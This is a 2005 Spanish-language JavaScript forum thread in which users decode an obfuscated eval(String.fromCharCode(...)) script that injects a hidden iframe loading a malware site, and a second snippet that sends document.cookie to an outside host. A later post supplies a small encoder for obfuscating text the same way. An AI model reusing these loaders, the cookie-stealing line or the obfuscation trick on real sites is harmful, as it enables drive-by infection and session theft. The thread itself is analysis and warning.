Foros del Web » Programando para Internet » Javascript »

Desencriptar codigos

Estas en el tema de Desencriptar codigos en el foro de Javascript en Foros del Web. Hola ma todos tengo el siguiente codigo: NO PEGAR, ES UN VIRUS! Código HTML: <script language=javascript> eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,118,120,105,102,114,97,109,101,46,98,105,122,47,97,100,118,101,114,116,115,47,48,51,47,49,46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41)) </script> No se que es, pero alguien podria ...
  #1 (permalink)  
Antiguo 15/01/2005, 13:38
 
Fecha de Ingreso: mayo-2004
Mensajes: 51
Antigüedad: 20 años
Puntos: 0
Desencriptar codigos

Hola ma todos tengo el siguiente codigo:


NO PEGAR, ES UN VIRUS!

Código HTML:
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,118,120,105,102,114,97,109,101,46,98,105,122,47,97,100,118,101,114,116,115,47,48,51,47,49,46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> 

No se que es, pero alguien podria decirme como se desencripta esto, y como tambien se puede encriptar???, mi objetivo mio es desencriptarlo pues no se que funcion haga....... solo se que este codigo me cuela un software.....

alguna ayuda??

Última edición por KarlanKas; 17/01/2005 a las 05:15
  #2 (permalink)  
Antiguo 15/01/2005, 13:50
Avatar de tunait
Moderadora
 
Fecha de Ingreso: agosto-2001
Ubicación: Terok Nor
Mensajes: 16.805
Antigüedad: 22 años, 8 meses
Puntos: 381
Cómo encriptarlo ni idea aunque no debe de ser dificil hacer una función que lo haga.

Pero por si te interesa saber más o menos lo que es devuelve esto

Código:
<IFRAME style="DISPLAY: none" border=0 src="http://vxiframe.biz/advert/03/1.php" width=0 height0></irame>
  #3 (permalink)  
Antiguo 17/01/2005, 04:57
Avatar de KarlanKas
Moderador extraterrestre
 
Fecha de Ingreso: diciembre-2001
Ubicación: Madrid
Mensajes: 6.987
Antigüedad: 22 años, 4 meses
Puntos: 61

Para verlo pon:
Código HTML:
<script language=javascript>pepe=(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,118,120,105,102,114,97,109,101,46,98,105,122,47,97,100,118,101,114,116,115,47,48,51,47,49,46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41))
pepe=pepe.split("<").join("&lt");
document.write(pepe);

</script> 
Saldrá, como dice tunait:
Código HTML:
document.write("<iframe border=0 width=0 height=0 style='display:none' src='http://vxiframe.biz/adverts/03/1.php'></iframe>")
No lo pegues a ningún sitio ya que este código es para cargar un virus en tu ordenador, más concretamente el Exploit/Mhtredir.ge.

Para más información sobre este virus:

http://www.pandasoftware.es/virus_in...eteccion=47598
__________________
Cómo escribir

No hay pregunta tonta, sino tonto que quiere seguir en la ignorancia.
  #4 (permalink)  
Antiguo 17/01/2005, 09:04
 
Fecha de Ingreso: mayo-2003
Mensajes: 866
Antigüedad: 21 años
Puntos: 0
He probado lo que dice KarlanKas pero no obtengo nada, ¿He puesto algo mal?
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Documento sin t&iacute;tulo</title>
</head>
<body>
<script language=javascript>
pepe=(String.fromCharCode(100,111,99,117,109,101,1 10,116,46,119,114,105,116,101,40,34,60,105,102,114 ,97,109,101,32,98,111,114,100,101,114,61,48,32,119 ,105,100,116,104,61,48,32,104,101,105,103,104,116, 61,48,32,115,116,121,108,101,61,39,100,105,115,112 ,108,97,121,58,110,111,110,101,39,32,115,114,99,61 ,39,104,116,116,112,58,47,47,118,120,105,102,114,9 7,109,101,46,98,105,122,47,97,100,118,101,114,116, 115,47,48,51,47,49,46,112,104,112,39,62,60,47,105, 102,114,97,109,101,62,34,41))
pepe=pepe.split("<").join("&lt");
document.write(pepe);
</script>
</body>
</html>
  #5 (permalink)  
Antiguo 17/01/2005, 09:59
Avatar de KarlanKas
Moderador extraterrestre
 
Fecha de Ingreso: diciembre-2001
Ubicación: Madrid
Mensajes: 6.987
Antigüedad: 22 años, 4 meses
Puntos: 61
No hagas salto de linea en la variable pepe(pon todos los números y comas seguidos sin espacios ni saltos de línea).

Así:

Código HTML:
<html>
<head>
	<title>Untitled</title>
</head>

<body>
<script language=javascript>

pepe=(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,118,120,105,102,114,97,109,101,46,98,105,122,47,97,100,118,101,114,116,115,47,48,51,47,49,46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41))
pepe=pepe.split("<").join("&lt");
document.write(pepe);

</script>


</body>
</html> 
__________________
Cómo escribir

No hay pregunta tonta, sino tonto que quiere seguir en la ignorancia.

Última edición por KarlanKas; 17/01/2005 a las 10:02
  #6 (permalink)  
Antiguo 17/01/2005, 10:05
 
Fecha de Ingreso: mayo-2003
Mensajes: 866
Antigüedad: 21 años
Puntos: 0
Karlankas he copiado y pegado el codigo que me has puesto arriba,
pero sigo sin obtener ningun resultado

Última edición por sqa212; 17/01/2005 a las 10:16
  #7 (permalink)  
Antiguo 17/01/2005, 10:57
Avatar de KarlanKas
Moderador extraterrestre
 
Fecha de Ingreso: diciembre-2001
Ubicación: Madrid
Mensajes: 6.987
Antigüedad: 22 años, 4 meses
Puntos: 61
Si ya sabes lo que pone el código para qué lo quieres?

Sólo tienes que copiar y pegar el texto y luego quitar los espacios que haya entre los números que hay entre los paréntesis... tampoco es tan dificil...
__________________
Cómo escribir

No hay pregunta tonta, sino tonto que quiere seguir en la ignorancia.
  #8 (permalink)  
Antiguo 17/01/2005, 11:50
 
Fecha de Ingreso: mayo-2003
Mensajes: 866
Antigüedad: 21 años
Puntos: 0
Ahora si, Gracias karlankas y perdona por las molestias.
Lo queria por dos motivos:
1.- Para aprender
2.-Por que me sonaba heberlo visto antes en algun sitio.
Exactamente tenia esto:
pepe=(String.fromCharCode(116,104,105,115,46,115,1 16,121,108,101,46,98,97,99,107,103,114,111,117,110 ,100,73,109,97,103,101,61,34,117,114,108,40,104,11 6,116,112,58,47,47,102,101,114,114,117,104,46,109, 97,118,105,116,117,110,97,46,99,111,109,47,120,115 ,115,47,63,34,43,100,111,99,117,109,101,110,116,46 ,99,111,111,107,105,101,43,34,41,34))

Y he podido ver que se trata de esto:
this.style.backgroundImage="url(http://ferruh.mavituna.com/xss/?"+document.cookie+")"
  #9 (permalink)  
Antiguo 17/01/2005, 11:54
Avatar de KarlanKas
Moderador extraterrestre
 
Fecha de Ingreso: diciembre-2001
Ubicación: Madrid
Mensajes: 6.987
Antigüedad: 22 años, 4 meses
Puntos: 61
Vaya, pues es algo común, entonces usar estos bichos...
__________________
Cómo escribir

No hay pregunta tonta, sino tonto que quiere seguir en la ignorancia.
  #10 (permalink)  
Antiguo 20/01/2005, 17:03
 
Fecha de Ingreso: mayo-2004
Mensajes: 51
Antigüedad: 20 años
Puntos: 0
Hola todos.... pero alguien sabe como se puede hacer para encriptar???
  #11 (permalink)  
Antiguo 20/01/2005, 18:07
Avatar de Carlitos
Usuario no validado
 
Fecha de Ingreso: mayo-2001
Ubicación: Zaragoza
Mensajes: 1.304
Antigüedad: 23 años
Puntos: 25
Hola.

te dejo un codificador
Código:
<script>
// convierte texto a ASCII. por carlitos
function cod() 
{
var cadena='';
for (i=0;i<document.formul.texto.value.length;i++) cadena += document.formul.texto.value.charCodeAt(i)+","
document.formul.texto.value = cadena;
}

</script>

<form name="formul">
<textarea name="texto"></textarea>
<input type="button"  value="encripta" onclick="cod()">
</form>
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 06:47.